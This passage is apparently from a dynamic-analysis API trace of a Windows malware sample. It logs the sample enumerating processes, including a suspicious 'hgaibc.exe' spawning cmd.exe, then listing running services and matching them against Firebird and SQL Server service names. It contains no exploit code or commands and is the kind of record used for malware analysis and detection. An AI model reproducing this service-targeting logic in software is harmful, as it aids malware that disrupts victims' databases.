szExeFile="dwm.exe")) returned 1 [0159.704] lstrlenW (lpString="dwm.exe") returned 7 [0159.704] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.705] lstrlenW (lpString="svchost.exe") returned 11 [0159.705] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.706] lstrlenW (lpString="svchost.exe") returned 11 [0159.706] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.707] lstrlenW (lpString="svchost.exe") returned 11 [0159.707] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.708] lstrlenW (lpString="svchost.exe") returned 11 [0159.708] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.709] lstrlenW (lpString="svchost.exe") returned 11 [0159.709] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.710] lstrlenW (lpString="svchost.exe") returned 11 [0159.710] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.711] lstrlenW (lpString="svchost.exe") returned 11 [0159.711] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.712] lstrlenW (lpString="svchost.exe") returned 11 [0159.712] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.712] lstrlenW (lpString="svchost.exe") returned 11 [0159.712] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.713] lstrlenW (lpString="svchost.exe") returned 11 [0159.713] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0159.714] lstrlenW (lpString="spoolsv.exe") returned 11 [0159.714] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.715] lstrlenW (lpString="svchost.exe") returned 11 [0159.715] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0159.716] lstrlenW (lpString="audiodg.exe") returned 11 [0159.716] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0159.717] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0159.717] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0159.718] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0159.718] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0159.719] lstrlenW (lpString="Memory Compression") returned 18 [0159.719] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0159.719] lstrlenW (lpString="sihost.exe") returned 10 [0159.720] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.720] lstrlenW (lpString="svchost.exe") returned 11 [0159.720] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0159.721] lstrlenW (lpString="msoia.exe") returned 9 [0159.721] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0159.722] lstrlenW (lpString="taskhostw.exe") returned 13 [0159.722] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0159.722] lstrlenW (lpString="explorer.exe") returned 12 [0159.723] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0159.723] lstrlenW (lpString="SearchUI.exe") returned 12 [0159.723] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0159.724] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0159.724] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0159.725] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0159.725] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.186] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0160.186] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0160.187] lstrlenW (lpString="hgaibc.exe") returned 10 [0160.187] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0160.188] lstrlenW (lpString="cmd.exe") returned 7 [0160.188] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0160.189] lstrlenW (lpString="conhost.exe") returned 11 [0160.189] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0160.190] CloseHandle (hObject=0x42c) returned 1 [0160.190] Sleep (dwMilliseconds=0x1f4) [0160.834] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c1c8 [0160.835] EnumServicesStatusExW (in: hSCManager=0x458c1c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0160.835] GetLastError () returned 0xea [0160.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x456d7b8 [0160.835] EnumServicesStatusExW (in: hSCManager=0x458c1c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x456d7b8, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x456d7b8, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0160.836] CloseServiceHandle (hSCObject=0x458c1c8) returned 1 [0160.836] lstrlenW (lpString="AppXSvc") returned 7 [0160.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0160.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0160.850] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0160.850] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0160.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0160.850] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0160.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0160.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0160.852] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0160.852] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0160.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0160.852] lstrlenW (lpString="Audiosrv") returned 8 [0160.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0160.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0160.858] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0160.859] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0160.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0160.859] lstrlenW (lpString="BFE") returned 3 [0160.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0160.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0160.859] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0160.859] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0160.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0160.859] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0160.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0160.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0160.859] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0160.859] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0160.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0160.859] lstrlenW (lpString="CDPSvc") returned 6 [0160.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0160.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0160.859] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0160.859] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0160.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0160.859] lstrlenW (lpString="ClickToRunSvc") returned 13 [0160.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0160.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0160.859] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0160.859] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0160.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0160.860] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0160.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0160.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0160.860] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0160.860] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0160.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0160.860] lstrlenW (lpString="CryptSvc") returned 8 [0160.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0160.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0160.860] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0160.860] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0160.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0160.860] lstrlenW (lpString="DcomLaunch") returned 10 [0160.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0160.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0160.860] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0160.860] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0160.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0160.861] lstrlenW (lpString="DeviceAssociationService") returned 24 [0160.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0160.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0160.861] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0160.861] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0160.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0160.861] lstrlenW (lpString="Dhcp") returned 4 [0160.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0160.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0160.861] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0160.861] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0160.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0160.861] lstrlenW (lpString="Dnscache") returned 8 [0160.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0160.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0160.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0160.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0160.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0160.902] lstrlenW (lpString="DPS") returned 3 [0160.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0160.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0160.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0160.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0160.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0160.902] lstrlenW (lpString="DusmSvc") returned 7 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0160.903] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0160.903] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0160.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0160.903] lstrlenW (lpString="EventLog") returned 8 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0160.903] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0160.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0160.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0160.903] lstrlenW (lpString="EventSystem") returned 11 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0160.903] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0160.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0160.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0160.903] lstrlenW (lpString="FontCache") returned 9 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0160.903] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0160.903] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0160.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0160.903] lstrlenW (lpString="gpsvc") returned 5 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0160.903] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0160.903] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0160.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0160.903] lstrlenW (lpString="iphlpsvc") returned 8 [0160.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0160.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0160.904] lstrlenW (lpString="KeyIso") returned 6 [0160.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0160.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0160.904] lstrlenW (lpString="LanmanServer") returned 12 [0160.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0160.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0160.904] lstrlenW (lpString="LanmanWorkstation") returned 17 [0160.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0160.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0160.904] lstrlenW (lpString="lfsvc") returned 5 [0160.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0160.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0160.904] lstrlenW (lpString="lmhosts") returned 7 [0160.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0160.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0160.904] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0160.904] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0160.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0160.905] lstrlenW (lpString="LSM") returned 3 [0160.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0160.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0160.905] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0160.905] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0160.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0160.905] lstrlenW (lpString="MpsSvc") returned 6 [0160.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0160.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0160.905] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0160.905] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0160.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0160.905] lstrlenW (lpString="NcbService") returned 10 [0160.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0160.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0160.905] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0160.905] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0160.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0160.905] lstrlenW (lpString="netprofm") returned 8 [0160.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0160.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0160.906] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0160.906] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0160.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0160.906] lstrlenW (lpString="NgcSvc") returned 6 [0160.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0160.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0160.906] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0160.906] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0160.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0160.906] lstrlenW (lpString="NlaSvc") returned 6 [0160.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 